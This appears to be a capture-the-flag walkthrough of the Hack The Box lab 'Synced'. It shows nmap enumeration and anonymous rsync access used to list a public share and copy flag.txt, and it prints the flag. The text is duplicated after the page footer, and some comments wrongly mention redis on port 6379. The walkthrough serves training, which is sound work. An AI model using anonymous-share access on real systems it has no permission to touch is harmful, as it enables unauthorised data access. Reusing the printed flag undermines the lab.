08.SYNCED (RSYNC)

Rsync, Protocols, Reconnaissance, Anonymous/Guest Access

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 {targetIP} -p-
 PORT   STATE SERVICE VERSION
 873/tcp open  rsync   (protocol version 31)

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 873
 PORT   STATE SERVICE VERSION
 873/tcp open  rsync   (protocol version 31)

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 873
 PORT   STATE SERVICE
 873/tcp open  rsync

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

root@htb:~$ which rsync
 /usr/bin/rsync

root@htb:~$ rsync --help

 * syntax: rsync [OPTION] … [USER@]HOST::SRC [DEST]

#LISTINGS & COPYING METHOD
root@htb:~$ rsync --list-only 10.129.228.37::
 public         	Anonymous Share
 
 * list all the available directories to an anonymous user
 
root@htb:~$ rsync --list-only 10.129.228.37::public
 drwxr-xr-x          4,096 2022/10/24 17:02:23 .
 -rw-r--r--             33 2022/10/24 16:32:03 flag.txt

root@htb:~$ rsync 10.129.228.37::public/flag.txt flag.txt
root@htb:~$ cat flag.txt 
 72eaf5344ebb84908ae543a719830519
 
#ALTERNATIVE

root@htb:~$ rsync rsync://10.129.228.37
 * this cmd connects to the server using anonymous credentials

root@htb:~$ rsync -av --list-only  rsync://10.129.228.37/public
 drwxr-xr-x          4,096 2022/10/24 17:02:23 .
 -rw-r--r--             33 2022/10/24 16:32:03 flag.txt
 
 * -a means archive
 * -v means verbose
 
root@htb:~$ rsync -av rsync://10.129.228.37/public/flag.txt /home/str1f3/Downloads/
 receiving incremental file list
 flag.txt

root@htb:~$ cat flag.txt
 * 72eaf5344ebb84908ae543a719830519

Previous07.MONGOD (MONGODB)NextTIER 1

Last updated 2 months ago

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 873
 PORT   STATE SERVICE VERSION
 873/tcp open  rsync   (protocol version 31)

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 873
 PORT   STATE SERVICE
 873/tcp open  rsync

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

root@htb:~$ which rsync
 /usr/bin/rsync

root@htb:~$ rsync --help

 * syntax: rsync [OPTION] … [USER@]HOST::SRC [DEST]

#LISTINGS & COPYING METHOD
root@htb:~$ rsync --list-only 10.129.228.37::
 public         	Anonymous Share
 
 * list all the available directories to an anonymous user
 
root@htb:~$ rsync --list-only 10.129.228.37::public
 drwxr-xr-x          4,096 2022/10/24 17:02:23 .
 -rw-r--r--             33 2022/10/24 16:32:03 flag.txt

root@htb:~$ rsync 10.129.228.37::public/flag.txt flag.txt
root@htb:~$ cat flag.txt 
 72eaf5344ebb84908ae543a719830519
 
#ALTERNATIVE

root@htb:~$ rsync rsync://10.129.228.37
 * this cmd connects to the server using anonymous credentials

root@htb:~$ rsync -av --list-only  rsync://10.129.228.37/public
 drwxr-xr-x          4,096 2022/10/24 17:02:23 .
 -rw-r--r--             33 2022/10/24 16:32:03 flag.txt
 
 * -a means archive
 * -v means verbose
 
root@htb:~$ rsync -av rsync://10.129.228.37/public/flag.txt /home/str1f3/Downloads/
 receiving incremental file list
 flag.txt

root@htb:~$ cat flag.txt
 * 72eaf5344ebb84908ae543a719830519